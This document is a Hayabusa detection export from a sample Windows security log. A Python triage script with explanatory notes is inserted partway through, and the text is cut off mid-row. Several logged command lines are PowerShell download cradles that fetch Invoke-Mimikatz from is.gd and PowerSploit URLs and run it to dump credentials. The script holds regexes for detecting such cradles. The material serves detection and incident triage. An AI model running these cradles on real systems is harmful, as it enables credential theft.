2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd10 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4a8 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ec | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
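The rows above show the two populations a triage script has to separate: the low-level "Suspicious Cmd Line_Possible LOLBIN Abuse" hits that are routine on this image (the VMware Tools resume/suspend hooks, ipconfig renew/release, DllHost COM surrogates, all under the SYSTEM logon session 0x3e7), and the PowerShell download cradles pulling Invoke-Mimikatz, each of which the Sigma AV-keyword rule also fires on as a high-level event at the same timestamp. The script below is an added example, not code from Hayabusa or from this page: it parses Hayabusa's CSV columns, splits the Details field, applies a host-specific allow-list, flags download cradles, extracts their URLs, and reports which cradles a second higher-severity rule corroborates. The sample rows are constructed from the output above with the FilePath column shortened; the allow-list patterns, the verdict names and the known-key list for the Details parser are this example's own assumptions.

```python
import csv
import io
import re
from collections import defaultdict

# Well-known logon ID of the SYSTEM logon session (0x3e7 = 999). Processes started
# by services and scheduled tasks carry it; interactive users get a fresh LID.
SYSTEM_LID = "0x3e7"

# Constructed sample in Hayabusa's CSV column layout, trimmed from the page's rows
# with FilePath shortened. Not Hayabusa's own test data.
SAMPLE_CSV = r'''Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath
2016-08-25 06:17:10.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x478 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,many-events-security.evtx
2016-08-25 06:17:10.109 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,many-events-security.evtx
2016-08-25 06:20:07.546 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xe90 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,many-events-security.evtx
2016-08-25 06:21:09.578 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{6D9A7A40-DDCA-414E-B48E-DFB032C03C1B} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,many-events-security.evtx
2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4a8 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,many-events-security.evtx
2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,many-events-security.evtx
2016-08-25 06:29:40.093 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf74 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,many-events-security.evtx
'''

# Keys Hayabusa's 4688 rule emits in Details (assumed fixed set for this example).
KNOWN_KEYS = ("Cmd Line", "Path", "PID", "User", "LID")

# Download-cradle markers and a URL extractor for IOC pull-out.
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|\bIEX\b|Invoke-Expression|Net\.WebClient|FromBase64String", re.I)
URL_RE = re.compile(r"https?://[^\s'\")]+")

# Host-specific allow-list of LOLBIN-rule hits that are routine on this image.
# Assumption for the example; tune per environment, and only trust it for the
# SYSTEM logon session (see classify()).
BENIGN_SYSTEM_PATTERNS = [
    re.compile(r'^C:\\Windows\\system32\\cmd\.exe /c ""C:\\Program Files\\VMware\\VMware Tools\\(resume|suspend)-vm-default\.bat""$', re.I),
    re.compile(r"^C:\\Windows\\system32\\ipconfig /(renew|release)$", re.I),
    re.compile(r"^C:\\Windows\\system32\\DllHost\.exe /Processid:\{[0-9A-F-]{36}\}$", re.I),
]


def parse_details(details):
    """Split Hayabusa's 'Key: value | Key: value' Details column into a dict.
    A ' | ' that is part of the command line itself (a PowerShell pipeline) is
    re-joined onto the previous value instead of being treated as a separator."""
    fields, current = {}, None
    for part in details.split(" | "):
        key, sep, value = part.partition(": ")
        if sep and key in KNOWN_KEYS:
            fields[key] = value
            current = key
        elif current is not None:
            fields[current] += " | " + part
    return fields


def classify(row):
    """Return a triage verdict for one Hayabusa CSV row."""
    if row["Level"] in ("high", "critical"):
        return "escalate"
    d = parse_details(row["Details"])
    cmd = d.get("Cmd Line", "")
    image = d.get("Path", "").lower()
    if image.endswith("powershell.exe") and CRADLE_RE.search(cmd):
        return "download-cradle"
    if d.get("LID") == SYSTEM_LID and any(p.match(cmd) for p in BENIGN_SYSTEM_PATTERNS):
        return "benign-system"
    return "review"


def triage(csv_text):
    """Parse a Hayabusa CSV export and attach a Verdict to every row."""
    rows = list(csv.DictReader(io.StringIO(csv_text)))
    for r in rows:
        r["Verdict"] = classify(r)
    return rows


def corroborated_cradles(rows):
    """Download cradles paired with any high-level rule that fired on the same
    host at the same instant (here the Sigma AV-keyword rule on the same 4688)."""
    high = defaultdict(list)
    for r in rows:
        if r["Verdict"] == "escalate":
            high[(r["Computer"], r["Timestamp"])].append(r["RuleTitle"])
    hits = []
    for r in rows:
        if r["Verdict"] != "download-cradle":
            continue
        d = parse_details(r["Details"])
        hits.append({
            "timestamp": r["Timestamp"],
            "user": d.get("User"),
            "urls": URL_RE.findall(d.get("Cmd Line", "")),
            "corroborated_by": high.get((r["Computer"], r["Timestamp"]), []),
        })
    return hits


if __name__ == "__main__":
    rows = triage(SAMPLE_CSV)
    for r in rows:
        print(f'{r["Timestamp"]}  {r["Verdict"]:<16} {r["RuleTitle"]}')
    for hit in corroborated_cradles(rows):
        print("escalate:", hit)
```

Two caveats when running this against a full export. Pairing on (Computer, Timestamp) is a heuristic that works here because both rules fired on the same 4688 record; a busy host can log two different process creations within the same millisecond, so key on the event record ID if the export was produced with a profile that includes it. And the allow-list is gated on LID 0x3e7 deliberately: the same `cmd.exe /c ""...bat""` or `DllHost.exe /Processid:{...}` line under an interactive user's logon session is not covered by it and still comes back as `review`.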
2016-08-25 06:28:35.375 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:29:40.093 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf74 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4fc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:00:00.553 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x97c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:01:50.906 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:01:50.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x904 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:42:19.877 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:42:28.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbf4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:42:44.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:43:00.291 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:43:04.576 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hp2phgfx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xd50 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:44:00.792 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:44:00.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:44:02.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lnyiquaj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x818 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:45:43.530 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:45:43.908 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:45:45.304 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zqai1ke3.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb8c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:45:54.936 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:45:54.972 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf88 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:45:57.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lygfnats.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x21c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:47:33.985 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcd8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:47:34.016 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:49:42.000 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0x708 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:50:40.032 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" Command | Path: C:\Windows\System32\findstr.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:53:47.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:54:04.375 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0xb78 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:59:07.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" csc | Path: C:\Windows\System32\findstr.exe | PID: 0x9c8 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 08:01:26.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 08:01:26.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x5b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 00:03:05.916 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 00:03:06.884 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
